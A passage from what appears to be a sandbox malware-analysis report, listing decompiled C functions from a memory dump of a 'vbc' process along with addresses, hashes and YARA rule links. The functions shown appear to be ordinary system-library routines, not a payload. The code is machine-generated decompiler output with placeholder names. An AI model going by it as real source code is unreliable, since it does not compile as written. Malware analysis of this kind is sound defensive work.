					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E015EA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                  0x015f90af
                                                  0x015f90b8
                                                  0x015f90bb
                                                  0x015f90bf
                                                  0x015f90c2
                                                  0x015f90c2
                                                  0x015f90c8
                                                  0x015f90cb
                                                  0x015f90cd
                                                  0x016314d7
                                                  0x016314eb
                                                  0x016314eb
                                                  0x00000000
                                                  0x016314eb
                                                  0x016314db
                                                  0x016314e6
                                                  0x00000000
                                                  0x016314f2
                                                  0x016314e8
                                                  0x00000000
                                                  0x016314e8
                                                  0x015f90d8
                                                  0x015f90da
                                                  0x015f90dd
                                                  0x015f90e5
                                                  0x00000000
                                                  0x015f9139
                                                  0x015f90fa
                                                  0x015f90fe
                                                  0x015f9142
                                                  0x00000000
                                                  0x015f9142
                                                  0x015f9104
                                                  0x015f9107
                                                  0x015f910b
                                                  0x015f9110
                                                  0x015f9118
                                                  0x015f9147
                                                  0x015f9148
                                                  0x015f914f
                                                  0x015f9150
                                                  0x015f9151
                                                  0x015f9152
                                                  0x015f9156
                                                  0x015f915d
                                                  0x015f9160
                                                  0x015f9168
                                                  0x015f916c
                                                  0x015f91bc
                                                  0x015f91be
                                                  0x00000000
                                                  0x015f91be
                                                  0x015f916e
                                                  0x015f9173
                                                  0x015f9176
                                                  0x00000000
                                                  0x00000000
                                                  0x015f917c
                                                  0x015f9180
                                                  0x015f91b5
                                                  0x00000000
                                                  0x015f91b5
                                                  0x015f9182
                                                  0x015f9185
                                                  0x015f9189
                                                  0x00000000
                                                  0x00000000
                                                  0x015f918e
                                                  0x015f9190
                                                  0x015f9198
                                                  0x00000000
                                                  0x00000000
                                                  0x015f91a0
                                                  0x00000000
                                                  0x015f91ad
                                                  0x015f91ad
                                                  0x015f91b0
                                                  0x015f91b1
                                                  0x00000000
                                                  0x015f9185
                                                  0x015f911a
                                                  0x015f911c
                                                  0x015f911f
                                                  0x015f9125
                                                  0x015f9127
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction ID: 517ef2684e6991bd7268af552a3107d0acbe715a83b50620c4e77cd7564c6298
                                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                  • Instruction Fuzzy Hash: 65217C71A40605EFDB21DF59C844EAAFBF8FB94314F14887EFA49AB251D330A904CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E3B7A Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E015E3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x16a84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x16a84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x16a84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E015FAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E015FFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x16a84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x16a84c4; // 0x0
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                  0x015e3b89
                                                  0x015e3b96
                                                  0x015e3ba1
                                                  0x015e3bab
                                                  0x015e3bb5
                                                  0x015e3bb9
                                                  0x01626298
                                                  0x015e3bbf
                                                  0x015e3bc2
                                                  0x015e3bc3
                                                  0x015e3bc9
                                                  0x015e3bca
                                                  0x015e3bcc
                                                  0x015e3bcd
                                                  0x015e3bd4
                                                  0x015e3bd6
                                                  0x015e3bdb
                                                  0x015e3bea
                                                  0x015e3bf7
                                                  0x015e3bfb
                                                  0x015e3bff
                                                  0x015e3c09
                                                  0x015e3c0a
                                                  0x015e3c0b
                                                  0x015e3c0f
                                                  0x015e3c14
                                                  0x015e3c18
                                                  0x015e3c18
                                                  0x015e3bfb
                                                  0x015e3c1b
                                                  0x015e3c30
                                                  0x015e3c30
                                                  0x015e3c3d

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 093b621fd17b1e70e9a8da7c3584c131ad73067038c16141569454baef1fe53e
                                                  • Instruction ID: 5916b6439ffcbfe0a3433e9d5735040bb91bbb73d9c2b582d873c12321948454
                                                  • Opcode Fuzzy Hash: 093b621fd17b1e70e9a8da7c3584c131ad73067038c16141569454baef1fe53e
                                                  • Instruction Fuzzy Hash: 4E219FB2A01119AFC714DF58CD81B5ABBBDFF44708F250068EA09AB252D371FD25CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01636CF0 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E01636CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E015D7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E015D7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1595c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E015EF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E015EF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01637016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L015D2400( &_v52);
								}
								_t21 = L015D2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                  0x01636cfb
                                                  0x01636d00
                                                  0x01636d02
                                                  0x01636d06
                                                  0x01636d0a
                                                  0x01636d0e
                                                  0x01636d19
                                                  0x01636d2b
                                                  0x01636d1b
                                                  0x01636d24
                                                  0x01636d24
                                                  0x01636d33
                                                  0x01636d39
                                                  0x01636d46
                                                  0x01636d4f
                                                  0x01636d61
                                                  0x01636d51
                                                  0x01636d5a
                                                  0x01636d5a
                                                  0x01636d69
                                                  0x01636d6b
                                                  0x01636d6d
                                                  0x01636d6f
                                                  0x01636d6f
                                                  0x01636d74
                                                  0x01636d79
                                                  0x01636d7a
                                                  0x01636d7f
                                                  0x01636d82
                                                  0x01636d88
                                                  0x01636d89
                                                  0x01636d90
                                                  0x01636d94
                                                  0x01636da7
                                                  0x01636db1
                                                  0x01636db1
                                                  0x01636dbb
                                                  0x01636dbb
                                                  0x01636d90
                                                  0x01636d69
                                                  0x01636d46
                                                  0x01636dc6

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d299ff9d0d0aca78b2660ede1ed86381d0aa63bb43c57608e456a5b08bd16662
                                                  • Instruction ID: 53ed45b69a3ac8938f213c04541d9c6a1f34ecc3453561c7c5858326743471f9
                                                  • Opcode Fuzzy Hash: d299ff9d0d0aca78b2660ede1ed86381d0aa63bb43c57608e456a5b08bd16662
                                                  • Instruction Fuzzy Hash: 5D21D373900246ABD721EF6CCD48B6BBBECAFD1640F040556BA408B251EB34C649C7A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0168070D Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E0168070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E016807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0167AFDE( &_v8,  &_v12);
					E01681293(_t38, _v28, _t60);
					if(E015D7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E016714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                  0x0168071b
                                                  0x01680724
                                                  0x01680734
                                                  0x01680738
                                                  0x0168074b
                                                  0x0168074b
                                                  0x01680753
                                                  0x01680753
                                                  0x01680759
                                                  0x0168075d
                                                  0x01680774
                                                  0x01680779
                                                  0x0168077d
                                                  0x01680789
                                                  0x01680795
                                                  0x016807a7
                                                  0x01680797
                                                  0x016807a0
                                                  0x016807a0
                                                  0x016807af
                                                  0x016807c4
                                                  0x016807cd
                                                  0x016807cd
                                                  0x016807af
                                                  0x016807dc

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                  • Instruction ID: b32f0bd539c69c1ac54f0d46e679d8285dc48e2f0f8eb525dc73fa7fe0ad3c59
                                                  • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                  • Instruction Fuzzy Hash: 2521F2362042009FD715EF2CCC90B6ABBA6EBD4350F048A6DF9959B385D730D909CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01637794 Relevance: .1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E01637794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x16a7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E015FF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E015D7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E015F9AE0();
					_t24 = L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                  0x01637799
                                                  0x0163779a
                                                  0x0163779b
                                                  0x016377a3
                                                  0x016377ab
                                                  0x016377ae
                                                  0x016377b1
                                                  0x016377b1
                                                  0x016377bf
                                                  0x016377c4
                                                  0x016377c8
                                                  0x016377ce
                                                  0x016377d4
                                                  0x016377e0
                                                  0x016377e0
                                                  0x016377d6
                                                  0x016377d6
                                                  0x016377de
                                                  0x00000000
                                                  0x00000000
                                                  0x016377de
                                                  0x016377e5
                                                  0x016377f0
                                                  0x016377f3
                                                  0x016377f6
                                                  0x016377fd
                                                  0x01637800
                                                  0x0163780c
                                                  0x01637818
                                                  0x0163782b
                                                  0x0163781a
                                                  0x01637823
                                                  0x01637823
                                                  0x01637830
                                                  0x01637831
                                                  0x01637838
                                                  0x0163783d
                                                  0x0163783e
                                                  0x0163784f
                                                  0x0163784f
                                                  0x0163785a

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26d8cf5c272d4febd053e9e62286007d4e3af83d18ffcffe3387c270c86b9ec4
                                                  • Instruction ID: ec9839465f0364ddee3ed52f2a54f302863427249cd2614873280c08992c91b8
                                                  • Opcode Fuzzy Hash: 26d8cf5c272d4febd053e9e62286007d4e3af83d18ffcffe3387c270c86b9ec4
                                                  • Instruction Fuzzy Hash: F5215EB2500605ABC725DF69DC90EABBBA9FF88740F11456DE60ADB750D734E900CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DAE73 Relevance: .1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E015DAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E015D7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E015D7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E015D7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E015D7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01637794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                  0x015dae78
                                                  0x015dae7c
                                                  0x015dae7e
                                                  0x015dae81
                                                  0x015dae86
                                                  0x015dae8d
                                                  0x01622691
                                                  0x015dae93
                                                  0x015dae93
                                                  0x015dae93
                                                  0x015dae98
                                                  0x015dae9d
                                                  0x016226a2
                                                  0x016226b4
                                                  0x016226a4
                                                  0x016226ad
                                                  0x016226ad
                                                  0x016226b9
                                                  0x00000000
                                                  0x016226bb
                                                  0x00000000
                                                  0x016226bb
                                                  0x015daea3
                                                  0x015daea3
                                                  0x015daea3
                                                  0x015daeaa
                                                  0x016226c0
                                                  0x016226c9
                                                  0x016226c9
                                                  0x015daeb3
                                                  0x016226d4
                                                  0x016226e1
                                                  0x00000000
                                                  0x00000000
                                                  0x016226e7
                                                  0x016226ee
                                                  0x016226f0
                                                  0x016226f9
                                                  0x016226f9
                                                  0x01622702
                                                  0x01622708
                                                  0x01622708
                                                  0x0162270b
                                                  0x0162270f
                                                  0x01622711
                                                  0x01622711
                                                  0x01622725
                                                  0x01622725
                                                  0x00000000
                                                  0x015daeb9
                                                  0x015daeb9
                                                  0x015daebf
                                                  0x015daebf
                                                  0x015daeb3

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                  • Instruction ID: ecce25c06b442dc9a5c6fbdd876a4aa5834fa017fe500804c5e46ba01729bec7
                                                  • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                  • Instruction Fuzzy Hash: EF21C272601AA29FEB369B2CC954B2677E8FF45740F1900A4ED048F792D734DC40CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EFD9B Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E015EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E015C76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                  0x015efd9b
                                                  0x015efda0
                                                  0x015efda1
                                                  0x015efdab
                                                  0x015efdad
                                                  0x015efdb0
                                                  0x015efdb8
                                                  0x015efe0f
                                                  0x015efde6
                                                  0x015efde9
                                                  0x015efdec
                                                  0x0162c0c0
                                                  0x015efdfe
                                                  0x015efe06
                                                  0x015efe06
                                                  0x0162c0c8
                                                  0x015efe2d
                                                  0x015efe2d
                                                  0x00000000
                                                  0x015efe2d
                                                  0x0162c0d1
                                                  0x0162c0e0
                                                  0x0162c0e5
                                                  0x0162c0e5
                                                  0x0162c0e8
                                                  0x00000000
                                                  0x0162c0e8
                                                  0x015efdf4
                                                  0x00000000
                                                  0x00000000
                                                  0x015efdf6
                                                  0x015efdfa
                                                  0x015efe1a
                                                  0x015efe1f
                                                  0x015efe1f
                                                  0x015efdfc
                                                  0x00000000
                                                  0x015efdfc
                                                  0x015efdcc
                                                  0x015efdd0
                                                  0x015efe26
                                                  0x00000000
                                                  0x015efe26
                                                  0x015efdd8
                                                  0x015efddb
                                                  0x015efddd
                                                  0x015efde0
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction ID: 6ff1e9e50617cbd4bb1d60278b77ce258ddfa766ec6ec33dc17507da9c18858a
                                                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction Fuzzy Hash: 06217C72A00A51DFD739CF4DC644A6AFBE5FB94B10F25856EE9558BB11DB31AC00CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EB390 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E015EB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E015D2280(_t12, 0x16a8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E015F00C2(0x16a8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                  0x015eb395
                                                  0x015eb3a2
                                                  0x015eb3a5
                                                  0x015eb3aa
                                                  0x015eb3b2
                                                  0x015eb3ba
                                                  0x015eb3bd
                                                  0x015eb3c0
                                                  0x015eb3c4
                                                  0x015eb3c9
                                                  0x0162a3e9
                                                  0x0162a3ed
                                                  0x0162a3f0
                                                  0x0162a3ff
                                                  0x0162a403
                                                  0x0162a409
                                                  0x00000000
                                                  0x00000000
                                                  0x0162a40b
                                                  0x0162a40b
                                                  0x0162a40f
                                                  0x0162a415
                                                  0x0162a423
                                                  0x0162a423
                                                  0x0162a415
                                                  0x015eb3d1
                                                  0x015eb3e8
                                                  0x015eb3e8
                                                  0x015eb3d9

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24d9d3431e2ad5dc769b018633964e2133afe5ffa5edf10f7afab6d9105f8a30
                                                  • Instruction ID: 9f91ac1535a10e201b90e33bf4e092492190c64bd490d3540fd4cccfc55d950a
                                                  • Opcode Fuzzy Hash: 24d9d3431e2ad5dc769b018633964e2133afe5ffa5edf10f7afab6d9105f8a30
                                                  • Instruction Fuzzy Hash: 5A116F377011215BCB2D9E588D4162B72ABFFC9331B69412DDD16CB780C9719C02CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B9240 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E015B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x168f708);
				E0160D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E015F95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E015F95D0();
				_t33 =  *0x16a84c4; // 0x0
				L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x16a84c4; // 0x0
				L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x16a84c4; // 0x0
				E015D2280(L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x16a86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E015F95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E015F95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
